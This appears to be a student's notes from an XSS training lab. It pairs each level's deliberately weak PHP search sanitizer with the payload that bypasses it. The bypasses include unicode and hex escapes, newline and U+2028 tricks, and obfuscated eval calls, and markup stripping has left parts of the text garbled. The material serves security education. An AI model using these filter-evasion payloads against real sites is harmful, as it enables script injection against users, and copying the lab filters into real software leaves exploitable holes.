# xss-iframe XSS-IFRAME Tools <--invisible iframe xsser --gtk *\**this will launch a ncie gui ## ***\*\****Examples from the lab: alert('l33t') \>alert(\'l33t\') \ alert('l33t') alert('l33t') \u0061lert('l33t') eval('\x61lert(\\'l33t\\')') \[NL]eval('\x61lert(\\'l33t\\')' \[\u2028]eval('\x61lert(\\'l33t\\')' eval(8680439..toString(30))(983801..toString(36)) ## ***\****Examples from the lab, accompanied by the code/filter presented in lab function Sanitizer($search){ // Let's start... return 'Your search "**' . $search . '**" did not match any products'; } alert('l33t') function Sanitizer($search){ //To script, or not script.. $search = preg\_replace('##is', NOSCRIPT, $search); return 'Your search "**' + $search + '**" did not match any products'; } \>alert(\'l33t\') function Sanitizer($search){ //To script, or not script... this is no more the problem $search = preg\_replace('##is', NOSCRIPT, $search); return 'Your search "**' + $search + '**" did not match any products'; } \ function Sanitizer($search){ //Script must be closed, here's a stronger filter... isn't it? $search = preg\_replace('#(.*?)\#is', NOSCRIPT, $search); //No ON no party!\ $search = preg\_replace('#(on\w+\s\*=)#s', NOEVENTS, $search); return 'Your search "**' + $search + '**" did not match any products'; } alert('l33t') function Sanitizer($search){ //No ON no party!\ $search = preg\_replace('#(on\w+\s\*=)#s', NOEVENTS, $search); //No Functions no party! $search = preg\_replace('#\[()]#s', NOFUNCTIONS, $search); return 'Your search "**' + $search + '**" did not match any products'; } alert('l33t') function Sanitizer($search){ //No alert no party!\ $search = preg\_replace('#alert#is', NOALERT, $search); return 'Your search "**' + $search + '**" did not match any products'; } \u0061lert('l33t') function Sanitizer($search){ // No Unicode escaping.. there are a lot of smart guys out of there... // Thanks to stackoverflow\.com > $search = preg\_replace\_callback('/\\\u(\[0-9a-fA-F]{4})/', function ($m) { return mb\_convert\_encoding(pack('H\*', $m\[1]), 'UTF-8', 'UCS-2BE'); }, $search); //No alert no party!\ $search = preg\_replace('#alert#is', NOALERT, $search); return 'Your search "**' + $search + '**" did not match any products'; } eval('\x61lert(\\'l33t\\')') function Sanitizer($search){ // Breaking bad... //No alert no party!\ $search = preg\_replace('#alert#is', NOALERT, $search); return << //console.debug( $search ); RESULT; } \[NL]eval('\x61lert(\\'l33t\\')' function Sanitizer($search){ // Breaking bad... more stronger $search = preg\_replace('#\[\n\r]#', "", $search); //No alert no party!\ $search = preg\_replace('#alert#is', NOALERT, $search); return << //console.debug( $search ); RESULT; } \[\u2028]eval('\x61lert(\\'l33t\\')' function Sanitizer($search){ // No more string ... $search = preg\_replace('#\[\\'"+]#', "", $search); // ... no more alert ...\ $search = preg\_replace('#alert#is', NOALERT, $search); // ... no no more alternative ways! $search = preg\_replace('#.source#is', "", $search); $search = preg\_replace('#.fromCharCode#is', "", $search); return 'Your search "**' + $search + '**" did not match any products'; } eval(8680439..toString(30))(983801..toString(36)) function Sanitizer($search){ // No scripts from untrusted origins or you'll see a nice gorilla preg\_match('#^(?:https?:)?\\/\\/11.xss.labs\\/#is', urldecode($search), $matches);\ if(empty($matches)) $search = "...untrusted..."; // don't break the src tag\ $search = preg\_replace('#"#', "", $search); // ehehe and now? Are you still a ninja? $search = strtoupper($search); }